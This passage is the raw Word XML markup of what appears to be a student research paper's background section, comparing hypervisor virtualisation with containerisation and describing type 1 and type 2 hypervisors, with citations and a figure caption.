    <w:p w14:paraId="63014F3C" w14:textId="0CB76BF9" w:rsidR="0013724F" w:rsidRDefault="0013724F" w:rsidP="0013724F"/>
    <w:p w14:paraId="73B5F4B0" w14:textId="77777777" w:rsidR="00710FDE" w:rsidRPr="0013724F" w:rsidRDefault="00710FDE" w:rsidP="0013724F"/>
    <w:p w14:paraId="12F1619E" w14:textId="1BBE6122" w:rsidR="00696A58" w:rsidRDefault="00C961D3" w:rsidP="00D92488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc86859246"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="006850BF">
        <w:t xml:space="preserve">BACKGROUND </w:t>
      </w:r>
      <w:r>
        <w:t>RESEARCH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689C68B" w14:textId="3D3B716C" w:rsidR="00696A58" w:rsidRDefault="0099358C" w:rsidP="00D92488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="714"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc86859247"/>
      <w:r>
        <w:t>OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3A30D928" w14:textId="5F57A9DC" w:rsidR="00696A58" w:rsidRPr="00D234EA" w:rsidRDefault="00696A58" w:rsidP="00696A58">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>In recent years, containerisation has become a new trend in the IT industry, particularly within the cloud ecosystem and DevOps. It simplifies creating and deploying applications and is thus loved by DevOps engineers and cloud practitioners. However, its security platform has not been tested profoundly. This section will briefly introduce the concepts that are required to develop and understand the aim of this research paper, along with reviewing of research papers in the area that are related to this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F079BD5" w14:textId="77777777" w:rsidR="00696A58" w:rsidRPr="001357AE" w:rsidRDefault="00696A58" w:rsidP="00696A58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc266710277"/>
      <w:bookmarkStart w:id="7" w:name="_Toc266711030"/>
      <w:bookmarkStart w:id="8" w:name="_Toc271283211"/>
      <w:bookmarkStart w:id="9" w:name="_Toc340606375"/>
      <w:bookmarkStart w:id="10" w:name="_Toc340611902"/>
      <w:bookmarkStart w:id="11" w:name="_Toc340612072"/>
      <w:bookmarkStart w:id="12" w:name="_Toc340613999"/>
      <w:bookmarkStart w:id="13" w:name="_Toc341173665"/>
      <w:bookmarkStart w:id="14" w:name="_Toc341173843"/>
      <w:bookmarkStart w:id="15" w:name="_Toc341174523"/>
      <w:bookmarkStart w:id="16" w:name="_Toc345410421"/>
      <w:bookmarkStart w:id="17" w:name="_Toc345410752"/>
      <w:bookmarkStart w:id="18" w:name="_Toc345412857"/>
      <w:bookmarkStart w:id="19" w:name="_Toc371251349"/>
      <w:bookmarkStart w:id="20" w:name="_Toc371251398"/>
      <w:bookmarkStart w:id="21" w:name="_Toc371255378"/>
      <w:bookmarkStart w:id="22" w:name="_Toc371255533"/>
      <w:bookmarkStart w:id="23" w:name="_Toc86858507"/>
      <w:bookmarkStart w:id="24" w:name="_Toc86859248"/>
      <w:bookmarkStart w:id="25" w:name="_Toc202288068"/>
      <w:bookmarkStart w:id="26" w:name="_Toc26644754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61F24572" w14:textId="2E26C919" w:rsidR="00696A58" w:rsidRDefault="0099358C" w:rsidP="00D92488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc86859249"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:t>VIRTUALISATION VS CONTAINERISATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="72F79C13" w14:textId="74EAFF0F" w:rsidR="00696A58" w:rsidRDefault="00696A58" w:rsidP="00696A58">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtualisation is the key factor behind the existence and success of cloud computing technology. It is a technology that combines both hardware and software techniques to create virtual machines (VM) and allows multiple instances of OS to run on a single physical </w:t>
      </w:r>
      <w:r w:rsidR="00A318F0">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>machine and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be applied to create virtual instances of specific hardware components, such as storage, network, application, and memory.</w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Therefore, v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">irtualisation is used to capitalise and improve hardware resources to create cost-effective, scalable, efficient, flexible, and resilient IT services in clouding. Usually, virtualisation can </w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>be hypervisor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>-based or container-based. The hypervisor-based runs at the hardware level to create virtual machines, whereas container-based virtualisation occurs at the operating system level of the host machine</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:eastAsia="x-none"/>
          </w:rPr>
          <w:id w:val="-504522440"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION RKu15 \l 2057  \m SMo19</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:t>[2, 3]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47425B6A" w14:textId="0FDED81C" w:rsidR="006605FC" w:rsidRDefault="006605FC" w:rsidP="00696A58">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>In general, hypervisor virtualisation or known as Hyper-V</w:t>
      </w:r>
      <w:r w:rsidR="00C37129">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006A4F80">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>can be of type 1 or type 2.</w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> A type 1</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or bare-metal</w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> hypervisor create</w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>virtual machine</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>s (VM)</w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA69C1">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">that run directly </w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>on the host’s hardware</w:t>
      </w:r>
      <w:r w:rsidR="00CA69C1">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>entirely</w:t>
      </w:r>
      <w:r w:rsidR="00CA69C1">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> separated </w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">from the underlying operating system and are therefore </w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>highly</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> secure.</w:t>
      </w:r>
      <w:r w:rsidR="00A66DB7">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Furthermore, they provide better performance and efficiency than type 2 hypervisors</w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A66DB7">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00CF3A6A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> thus</w:t>
      </w:r>
      <w:r w:rsidR="00CF3A6A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> more commonly used for big data center </w:t>
      </w:r>
      <w:r w:rsidR="00DA10B4">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>warehouses and enterprises.</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> On the other hand, type 2 or hosted hypervisor technology creates </w:t>
      </w:r>
      <w:r w:rsidR="00A66DB7">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>VMs on the existing OS of the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00DA10B4">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">, see fig.1. </w:t>
      </w:r>
      <w:r w:rsidR="00FB6A32">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00DA10B4">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ith hosted hypervisor</w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DA10B4">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> different types of OS can be installed on the top of the </w:t>
      </w:r>
      <w:r w:rsidR="00FB6A32">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>host’s OS, sharing the host’s hardware resources</w:t>
      </w:r>
      <w:r w:rsidR="004D3D11">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can be installed on </w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
      <w:r w:rsidR="001C368B">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> desktop computers and laptops and are mainly used for experimenting and testing software’s</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:eastAsia="x-none"/>
          </w:rPr>
          <w:id w:val="-173341265"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00650722">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00650722">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Đor21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="001C368B">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> \m SRP17</w:instrText>
          </w:r>
          <w:r w:rsidR="00650722">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:t>[4, 5]</w:t>
          </w:r>
          <w:r w:rsidR="00650722">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FB6A32">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004D3D11">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> The following screenshot depicts the architecture of hypervisor virtualisation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79C772" w14:textId="34CE22D5" w:rsidR="00650722" w:rsidRDefault="00650722" w:rsidP="00650722">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3612E285" wp14:editId="0516EE9C">
            <wp:extent cx="4494938" cy="28702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0259" cy="2879983"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0E7BE" w14:textId="29CA081C" w:rsidR="00AA2D03" w:rsidRDefault="004D3D11" w:rsidP="004D3D11">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc86858592"/>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: type 1 and type 2 hypervisors</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-673643399"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00BA3876">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00BA3876">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Đor21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00BA3876">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidRPr="00BA3876">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="3486520A" w14:textId="2A80A312" w:rsidR="001C368B" w:rsidRDefault="001C368B" w:rsidP="001C368B">
      <w:r>
        <w:t xml:space="preserve">On the contrary, </w:t>
      </w:r>
      <w:r w:rsidR="004C1021">
        <w:t>containerisation</w:t>
      </w:r>
      <w:r w:rsidR="00A5255A">
        <w:t xml:space="preserve"> is a still new technology that enables to create VMs at the OS level of the host’s machine</w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5255A">
        <w:t xml:space="preserve">where each VM runs </w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t>wholly</w:t>
      </w:r>
      <w:r w:rsidR="00A5255A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E369C7">
        <w:t>isolated,</w:t>
      </w:r>
      <w:r w:rsidR="00C37129">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5255A">
        <w:t>and all share the host’s kernel OS.</w:t>
      </w:r>
      <w:r w:rsidR="00DC1EB4">
        <w:t xml:space="preserve"> It is mainly used to deploy multiple applications utilising the same OS on a single host or server.</w:t>
      </w:r>
      <w:r w:rsidR="00532D06">
        <w:t xml:space="preserve"> It keeps each application in its own </w:t>
      </w:r>
      <w:r w:rsidR="00BD7FB0">
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00B56F6F">
        <w:t xml:space="preserve"> or space, providing complete isolation and </w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00407285">
        <w:t xml:space="preserve">virtual </w:t>
      </w:r>
      <w:r w:rsidR="00B56F6F">
        <w:t>environment to each container</w:t>
      </w:r>
      <w:r w:rsidR="007237F3">
        <w:t>. They also share and access the host’s kernel directly.</w:t>
      </w:r>
      <w:r w:rsidR="00621DC9">
        <w:t xml:space="preserve"> Containers are built </w:t>
      </w:r>
      <w:r w:rsidR="0049295A">
        <w:t xml:space="preserve">using lightweight </w:t>
      </w:r>
      <w:r w:rsidR="00ED5DDB">
        <w:t xml:space="preserve">Linux-based </w:t>
      </w:r>
      <w:r w:rsidR="0049295A">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00950ECC">
        <w:t xml:space="preserve"> containing application</w:t>
      </w:r>
      <w:r w:rsidR="00ED5DDB">
        <w:t xml:space="preserve"> libraries, binaries,</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t xml:space="preserve"> dependencies</w:t>
      </w:r>
      <w:r w:rsidR="00F677FA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00452B3D">
        <w:t xml:space="preserve"> and packages on top of the host’s OS</w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t>and are</w:t>
      </w:r>
      <w:r w:rsidR="003A13C2">
        <w:t xml:space="preserve"> therefore</w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t xml:space="preserve"> easy</w:t>
      </w:r>
      <w:r w:rsidR="00457217">
        <w:t xml:space="preserve"> and fast</w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t xml:space="preserve"> to scale up, </w:t>
      </w:r>
      <w:r w:rsidR="003A13C2">
        <w:t xml:space="preserve">providing much </w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t>flexib</w:t>
      </w:r>
      <w:r w:rsidR="003A13C2">
        <w:t xml:space="preserve">ility </w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t xml:space="preserve"> have</w:t>
      </w:r>
      <w:r w:rsidR="00D17060">
        <w:t xml:space="preserve"> less performance overhead than hypervisor virtualisation in the native cloud environment. For these reasons</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t>, container</w:t>
      </w:r>
      <w:r w:rsidR="00B57E96">
        <w:t xml:space="preserve"> or container-based virtualisation</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B57E96">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t xml:space="preserve"> becoming the ideal framework </w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t xml:space="preserve">for creating </w:t>
      </w:r>
      <w:r w:rsidR="00B57E96">
        <w:t>virtual machines</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t xml:space="preserve"> in the cloud ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="002D73C7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00ED5DDB">
        <w:t xml:space="preserve"> In addition, containers </w:t>
      </w:r>
      <w:r w:rsidR="00F677FA">
        <w:t>support great</w:t>
      </w:r>
      <w:r w:rsidR="00A3296F">
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidR="00F677FA">
        <w:t xml:space="preserve"> portability </w:t>
      </w:r>
      <w:r w:rsidR="00065606">
        <w:t xml:space="preserve">for creating and deploying cloud-based applications while </w:t>
      </w:r>
      <w:r w:rsidR="00A3296F">
        <w:t>maintaining</w:t>
      </w:r>
      <w:r w:rsidR="00065606">
        <w:t xml:space="preserve"> continuous integration (CI) and continuous delivery (CD</w:t>
      </w:r>
      <w:r w:rsidR="00457217">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00457217" w:rsidRPr="002D73C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00457217">
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidR="00A3296F">
        <w:t xml:space="preserve"> development and deployment</w:t>
      </w:r>
      <w:r w:rsidR="00207C99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00457217">
        <w:t>to production environment</w:t>
      </w:r>
      <w:r w:rsidR="007143DE">
        <w:t xml:space="preserve"> on the cloud</w:t>
      </w:r>
      <w:r w:rsidR="00A3296F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="179629941"/>
          <w:citation/>
